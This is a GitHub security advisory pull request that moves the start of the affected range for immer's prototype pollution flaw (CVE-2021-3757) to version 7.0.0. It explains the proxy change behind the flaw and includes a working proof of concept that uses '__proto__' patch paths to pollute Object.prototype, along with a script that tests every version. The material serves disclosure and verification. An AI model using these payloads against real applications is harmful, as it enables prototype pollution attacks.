### PR TITLE
[GHSA-c36v-fmgq-m8hx] Prototype Pollution in immer

### DIFF
--- a/advisories/github-reviewed/2021/09/GHSA-c36v-fmgq-m8hx/GHSA-c36v-fmgq-m8hx.json
+++ b/advisories/github-reviewed/2021/09/GHSA-c36v-fmgq-m8hx/GHSA-c36v-fmgq-m8hx.json
@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-c36v-fmgq-m8hx",
-  "modified": "2022-09-11T22:24:21Z",
+  "modified": "2023-01-30T05:02:18Z",
   "published": "2021-09-07T22:57:14Z",
   "aliases": [
     "CVE-2021-3757"
@@ -25,7 +25,7 @@
           "type": "ECOSYSTEM",
           "events": [
             {
-              "introduced": "0"
+              "introduced": "7.0.0"
             },
             {
               "fixed": "9.0.6"


### PR DESCRIPTION
**Updates**
- Affected products

**Comments**
The implementation of `objectTraps.get` changed.
In version 6.0.9 and earlier [`objectTraps.get`](https://github.com/immerjs/immer/blob/v6.0.9/src/core/proxy.ts#L108) always returns a proxy object returned by [`createProxy`](https://github.com/immerjs/immer/blob/v6.0.9/src/core/proxy.ts#L131) which protects against prototype pollution.
Starting version 7.0.0, if [`!has(source, prop)`](https://github.com/immerjs/immer/blob/v7.0.0/src/core/proxy.ts#L106) then [`readPropFromProto`](https://github.com/immerjs/immer/blob/v7.0.0/src/core/proxy.ts#L210) will be called which doesn't create a proxy.

I verified that for all the versions using the following scripts:
`run.py`:
```python
import requests
import os
import subprocess
import shutil


def get_version():
    response = requests.get("https://registry.npmjs.org/immer")
    return response.json()["versions"].keys()


def main():
    versions = get_version()
    for version in versions:
        print(version)
        os.makedirs(version, exist_ok=True)
        subprocess.check_call(
            ["npm", "init", "-y"], stdout=subprocess.DEVNULL, cwd=version
        )
        subprocess.check_call(
            ["npm", "install", f"immer@{version}"],
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
            cwd=version,
        )
        shutil.copy("poc.js", version)
        subprocess.run(["node", "poc.js"], cwd=version)


if __name__ == "__main__":
    main()
```
`poc.js`:
```javascript
try{
    immer.enablePatches();
}catch(e){
}
let obj = {};
const patch1 = [ { op: 'add', path: [ "__proto__", "polluted1" ], value: "CVE-2020-28477" } ];
const patch2 = [{ op: 'add', path: [["__proto__"],"polluted2"], value: "CVE-2021-3757+CVE-2021-23436"}];
try{
    immer.applyPatches(obj , patch1);
} catch(e){
}
try{
    immer.applyPatches(obj , patch2);
} catch(e){
}
console.log("After : " + {}.polluted1 + " " + {}.polluted2);
```